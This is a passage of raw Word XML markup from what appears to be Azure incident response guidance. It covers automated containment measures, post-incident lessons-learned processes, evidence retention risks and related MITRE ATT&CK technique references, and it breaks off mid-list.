    <w:p w14:paraId="5FC77DDC" w14:textId="1FF2F857" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Virtual Network Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514FD76" w14:textId="6BF90CEA" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Automated virtual network segmentation and subnet isolation to prevent lateral movement during active incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283AFE3" w14:textId="4AB158D6" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Load Balancer and Traffic Manager Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615B937D" w14:textId="10D3D47D" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Automated removal of compromised resources from load balancer pools and traffic routing to prevent customer impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752CE29" w14:textId="2FCC0933" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>ExpressRoute and VPN isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6686D6" w14:textId="35F71803" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:lastRenderedPageBreak/>
        <w:t>Automated modification of routing policies to isolate compromised network segments from on-premises environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D21B7AB" w14:textId="5D3B61DF" w:rsidR="00203527" w:rsidRDefault="00203527">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Account and access control automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426478F6" w14:textId="05BC4154" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Microsoft Entra Conditional Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED3BDA8" w14:textId="7BC4485D" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Automated conditional access policy deployment blocking access from compromised accounts, devices, or locations (Conditional Access overview).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECEB848" w14:textId="1458F24C" w:rsidR="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Privileged Identity Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D757E" w14:textId="26358742" w:rsidR="00203527" w:rsidRPr="00203527" w:rsidRDefault="00203527" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00203527">
        <w:t>Automated revocation of privileged access assignments and just-in-time access for compromised accounts (PIM overview).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F895A" w14:textId="77777777" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00E41A4A"/>
    <w:p w14:paraId="37E31AF0" w14:textId="77777777" w:rsidR="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00E41A4A"/>
    <w:p w14:paraId="28940048" w14:textId="77777777" w:rsidR="00E41A4A" w:rsidRPr="00E41A4A" w:rsidRDefault="00E41A4A" w:rsidP="00E41A4A"/>
    <w:p w14:paraId="20E264E1" w14:textId="4EFCAF17" w:rsidR="00DC2CC4" w:rsidRDefault="00C47351" w:rsidP="00C47351">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc242449543"/>
      <w:r w:rsidRPr="00C47351">
        <w:t>IR-7: Post-incident activity - conduct lessons learned and retain evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="3A60F0D2" w14:textId="4517E9E0" w:rsidR="00C47351" w:rsidRDefault="00C47351">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47351">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A969710" w14:textId="3A6CDACA" w:rsidR="00C47351" w:rsidRDefault="00C47351" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C47351">
        <w:t>Establish systematic post-incident activities including comprehensive lessons learned processes, evidence retention with immutable storage, and continuous improvement of incident response capabilities based on real-world incident experience and evolving threat landscape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B87515" w14:textId="0397EE26" w:rsidR="00DD39C7" w:rsidRDefault="00DD39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD39C7">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD39C7">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3AD849EC" w14:textId="5E12612D" w:rsidR="00DD39C7" w:rsidRDefault="00DD39C7" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD39C7">
        <w:t>Recurring incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B650F37" w14:textId="6CA92155" w:rsidR="00DD39C7" w:rsidRDefault="00DD39C7" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD39C7">
        <w:t>Failure to identify and remediate fundamental gaps leads to repeated attacks through the same vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117496D4" w14:textId="12A26F91" w:rsidR="00DD39C7" w:rsidRDefault="00DD39C7" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD39C7">
        <w:t>Evidence destruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BAABF0" w14:textId="545CC50E" w:rsidR="00DD39C7" w:rsidRDefault="00DD39C7" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD39C7">
        <w:t>Lack of retention destroys forensic evidence needed for legal action, insurance claims, and regulatory compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDFC997" w14:textId="2430C8D2" w:rsidR="00DD39C7" w:rsidRDefault="00DD39C7" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD39C7">
        <w:t>Missed regulatory compliance obligations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7415E" w14:textId="0677FEB4" w:rsidR="00672E87" w:rsidRDefault="00672E87" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E87">
        <w:t>Industries with evidence retention requirements (HIPAA, SOX, PCI-DSS, GDPR) face significant penalties when evidence is not properly preserved for mandated timeframes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7CCD92" w14:textId="01547872" w:rsidR="00672E87" w:rsidRDefault="00672E87" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E87">
        <w:t>Ineffective security control improvements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529D655A" w14:textId="38C80423" w:rsidR="00672E87" w:rsidRDefault="00672E87" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E87">
        <w:t>Absence of systematic lessons learned processes prevents identification of security control gaps, leading to continued exposure to similar attacks and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91BD46" w14:textId="3D428A9A" w:rsidR="00672E87" w:rsidRDefault="00672E87" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E87">
        <w:t>Degraded incident response capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80A3F2" w14:textId="0A528A31" w:rsidR="00672E87" w:rsidRDefault="00672E87" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E87">
        <w:lastRenderedPageBreak/>
        <w:t>Teams fail to improve response procedures, tools, and training based on real incident experience, resulting in repeated response inefficiencies and delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D893941" w14:textId="0CE19E74" w:rsidR="00672E87" w:rsidRDefault="00672E87" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E87">
        <w:t>Lost organizational knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1BB0E" w14:textId="23AC205C" w:rsidR="00672E87" w:rsidRDefault="00672E87" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E87">
        <w:t>Individual incident experiences are not captured and shared across the organization, preventing organizational learning and capability development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8B5CD5" w14:textId="2188CC14" w:rsidR="00FA7980" w:rsidRDefault="00FA7980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA7980">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B6EB8" w14:textId="77777777" w:rsidR="00FA7980" w:rsidRDefault="00FA7980" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA7980">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC80D18" w14:textId="7C60326D" w:rsidR="00FA7980" w:rsidRDefault="00FA7980" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA7980">
        <w:t>account manipulation (T1098) reestablishing access through the same attack vectors when organizations fail to address root causes identified during post-incident analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC8FAE" w14:textId="77777777" w:rsidR="00FA7980" w:rsidRDefault="00FA7980" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA7980">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6369B612" w14:textId="0F3F642F" w:rsidR="00FA7980" w:rsidRPr="00FA7980" w:rsidRDefault="00FA7980" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA7980">
        <w:t xml:space="preserve">exploit public-facing application (T1190) repeatedly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA7980">
        <w:t>exploiting</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA7980">
        <w:t xml:space="preserve"> the same vulnerabilities when post-incident analysis fails to identify and remediate systemic security gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B599F" w14:textId="77777777" w:rsidR="00FA7980" w:rsidRDefault="00FA7980" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA7980">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF43A0A" w14:textId="0DF31A92" w:rsidR="00FA7980" w:rsidRPr="00FA7980" w:rsidRDefault="00FA7980" w:rsidP="004A4BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA7980">
        <w:t xml:space="preserve">exploit public-facing application (T1190) repeatedly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA7980">
        <w:t>exploiting</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA7980">
        <w:t xml:space="preserve"> the same vulnerabilities when post-incident analysis fails to identify and remediate systemic security gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6165CEA1" w14:textId="346F127E" w:rsidR="00FA7980" w:rsidRPr="00C47351" w:rsidRDefault="00FA7980" w:rsidP="00FA7980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0D4C14" w14:textId="65932034" w:rsidR="00105F1F" w:rsidRDefault="004D4001" w:rsidP="004D4001">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-7.1: Implement systematic lessons learned processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8F56B" w14:textId="37AF1AB1" w:rsidR="004D4001" w:rsidRDefault="004D4001">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Lessons learned framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323FA3EE" w14:textId="6AB3BF8F" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Post-incident review meetings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A526D4A" w14:textId="523FB93F" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Systematic review meetings within 72 hours of incident closure involving all stakeholders including technical responders, business owners, and senior management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6928453D" w14:textId="2C6E0921" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Root Cause Analysis Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6BCAC" w14:textId="535CD30E" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Structured root cause analysis using techniques such as Five Whys, Fishbone diagrams, and timeline analysis to identify fundamental causes beyond immediate symptoms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE54E44" w14:textId="2D58BD35" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Security Control Gap Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A2892A" w14:textId="30FE224D" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Comprehensive evaluation of security control effectiveness during incidents including detection capabilities, response procedures, and prevention mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A4DA06" w14:textId="6FDE07DB" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Timeline and Decision Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C938D38" w14:textId="4EA65E4B" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Detailed analysis of incident timeline, decision points, and response effectiveness to identify process improvements and training needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC73513" w14:textId="35821283" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:lastRenderedPageBreak/>
        <w:t>Stakeholder feedback collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410079D9" w14:textId="2DDDCC2F" w:rsidR="004D4001" w:rsidRDefault="004D4001" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4001">
        <w:t>Systematic collection of feedback from all incident stakeholders including users, customers, and external partners affected by the incident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32772EB8" w14:textId="185D9BC7" w:rsidR="00410C02" w:rsidRDefault="00410C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Improvement implementation tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E677749" w14:textId="343AC965" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Azure DevOps integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE468B4" w14:textId="724198B4" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Work item creation for identified improvements with assigned owners, deadlines, and progress tracking through Azure DevOps Boards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF06D13" w14:textId="3B7AABF2" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Security Roadmap Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C046AA3" w14:textId="4494799E" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Integration of lessons learned findings into organizational security roadmap and strategic planning processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9D118" w14:textId="5086C677" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Metrics and KPI Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D59CBA" w14:textId="3BE1C168" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Development of key performance indicators (KPIs) based on lessons learned to measure improvement effectiveness and incident response maturation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7FCF24" w14:textId="408DA12F" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Training and Awareness Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C87CE8" w14:textId="27734169" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Systematic updates to security awareness training, incident response procedures, and technical documentation based on lessons learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB5DE33" w14:textId="4FC1EE54" w:rsidR="00410C02" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
        <w:t>Tabletop Exercise Enhancement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1898BB3B" w14:textId="0D345185" w:rsidR="00410C02" w:rsidRPr="004D4001" w:rsidRDefault="00410C02" w:rsidP="00363B66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00410C02">
